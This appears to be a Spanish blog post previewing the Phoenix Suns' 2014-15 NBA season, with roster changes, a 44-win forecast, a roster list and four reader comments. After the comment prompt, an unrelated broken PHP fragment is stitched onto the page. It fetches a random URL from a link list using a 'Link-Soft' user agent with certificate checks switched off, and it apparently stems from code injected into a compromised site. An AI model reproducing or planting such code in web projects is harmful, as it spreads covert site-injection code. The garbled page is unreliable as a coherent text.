Phoenix Suns 2014-2015: La tierra ¿prometida?

07 de October de 2014 por Simon

Los Suns fueron sin lugar a dudas la gran sorpresa positiva de la temporada pasada. Todo el mundo esperaba un equipo que luchara por no ser el farolillo rojo de la conferencia pero a la hora de la verdad, liderados por Goran Dragic, se quedaron a un suspiro de entrar en los Playoffs en la conferencia más dura de la liga, compitiendo de tú a tú ante equipazos como Mavs o Grizzlies. A pesar del éxito, el verano se presentaba plagado de incertidumbre. Su gran promesa, Eric Bledsoe, acababa contrato y además el equipo disponía de bastante espacio salarial para acometer el fichaje de algún jugador de gran calidad. El dinero ha sido utilizado con cuidado: han firmando bastantes buenos contratos sin pagar más de lo necesario como hacen otras y se mantuvieron firmes ante las exigencias de Bledsoe, que pedía el máximo para renovar. El tira y afloja acabó ligeramente a favor del ex de Kentucky, que no consiguió el máximo pero sí un contrato superior al que podría merecer un jugador con poco tiempo en la élite y sin meniscos. Veremos.

Movimientos clave

La franquicia de Arizona ha apostado claramente por mantener el grueso de la joven plantilla para permitirles crecer juntos hasta que estén preparados para afrontar cotas mayores. A la ya mencionada renovación de Bledsoe se han unido la de  los hermanos Morris, que tan buen sabor de boca dejaron el año pasado, y la de PJ Tucker. Sin embargo, son las caras nuevas las que nos hacen dudar (y mucho) de que el plan de los Suns no pase por mover más fichas en algún momento de la temporada. Desde la agencia libre llegó el base Isiah Thomas y desde el draft se incorporaron Tyler Ennis, otro base, y TJ Warren, un alero que viene como anillo al dedo a este equipo. Otras incorporaciones menores son las de Zoran Dragic, hermano de Goran, y la de Anthony Tolliver.  Claramente parece haber una sobrepoblación en la posición de base-escolta. Veremos cómo acopla Jeff Hornacek tanto jugador de características parecidas pero a priori parece que la incorporaciones no eran las que más necesitaba el equipo.

¿Qué esperamos de ellos?

Gran dilema. Proyectar a los Suns este año es una tarea complicada. Repetir los registros de la temporada pasada lo vemos muy complicado a pesar de que la plantilla, con un Bledsoe sano y un buen acoplamiento de los rookies, sea superior sobre el papel a la de la temporada pasada. Lo que sí esperamos es que continúen practicando el mismo juego vistoso liderados con el gran Goran Dragic y que, sobre todo, se asienten como un equipo aspirante a estar en Playoffs año a año a corto-medio plazo.

Pronóstico

No creo que sean capaces de repetir el número de victorias de la campaña pasada. Ya no van de tapados y muchos equipos los tomarán en serio desde el inicio. 44 victorias y fuera de Play Off.

Plantilla

PG: Goran Dragic, Isiah Thomas, Tyler Ennis
SG: Eric Bledsoe, Zoran Dragic, Archie Goodwin
SF: TJ Warren, Gerald Green, PJ Tucker
PF: Markieff Morris, Marcus Morris, Anthony Tolliver
C: Miles Plumlee, Alex Len, Shavlik Randolph

Bajas: Frye (Magic), Barbosa (Warriors), Okafor, Smith.

Comenta

4 comentarios a esta entrada

  1. jmpa dice:
    #1

    Desde luego el backcourt que presentan los Suns es de lo mejorcito que se puede ver hoy día en la liga. Ello les va a permitir dosificarles más y mejor, para que lleguen a los finales de partidos más frescos y puedan ser más determinantes.
    Parece ser que quieren jugar más rápido. A ver como les sale.

    Tienen carencias, por supuesto, como la mayoría de equipos. Está claro que les vendría de perlas un PF-C que supiera jugar de espaldas al aro. Pero claro, hay tan pocos de esos en la NBA que no creo que merezca la pena ni lamentarse por ello.

    De todas formas la sobrepoblación en el puesto de PG abre las puertas a un traspaso. No me sorprendería nada que fuera incluso Bledsoe.

    Yo SI creo que pueden meterse en playoffs. El hecho de que ya les conozcan no creo que influya en demasía. El año pasado como mucho durante el primer mes pudieron sorprender a alguno, pero luego seguro que los servicios de scouting del resto de equipos les tuvieron muy en cuenta.

    OJO con el novato. Warren dio buenas sensaciones en la Summer League.

      Citar

  2. TheDeerHunter dice:
    #2

    Lo del año pasado fue bastante alucinante… y cuesta creer que puedan repetir algo así.
    El corazón me dice que Hornacek tiene preparado un small-ball que nos va a dejar a todos con el culo torcido, que Isiah va a ser perfectamente compatible con Goran y Bledsoe, que éste último va a estar sano y en modo mini-LeBron todo el año, que Zoran va a ser el puñal que es en su selección, que el rookie TJ Warren va a disputarle el puesto de titular a Gerald Green y que Alex Len va a ser lo que muchos esperaban que iba ser el año pasado…
    La cabeza sin embargo se parece más a tus conclusiones… aunque de momento no voy a descartarles para dar toda la guerra que puedan.

      Citar

  3. sundaydriver dice:
    #3

    No veo descabellado que mejoren lo del año pasado : dos jugadores por puesto, el equipo parece algo mejor que el año pasado (la marcha de Frye no hace daño), y si Plumlee y Len son capaces de dar solidez en la zona, hacen playoffs seguro. Markieff Morris mejorará sus números casi seguro. Zoran Dragic aportará defensa y corazón desde el banquillo, pero no mucho más (es un jugador que me desagrada profundamente). Y si Warren es tan bueno como decís, mucho más a favor de los Suns. Mi única duda es el papel de Isiah Thomas en este equipo

      Citar

  4. txusma dice:
    #4

    De momento Alex Len ya se ha roto un dedo de la mano (aunque tb he oido que lo q ha pasado es q se le ha agravado una lesión que se hizo en la Summer League). Hay mucha tralla en las posiciones de 1 (Dragic, Bledsoe, Thomas) y de 3 (Green, Tucker, Warren) por lo que no me extrañaría ver algún traspaso para reforzar el banco en las posiones de escolta y pívot. De momento, podían pensar en traspasar a Tyler Ennis por algún rookie que juegue en estas posiciones y que pudiera gozar de algún minuto más de juego.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>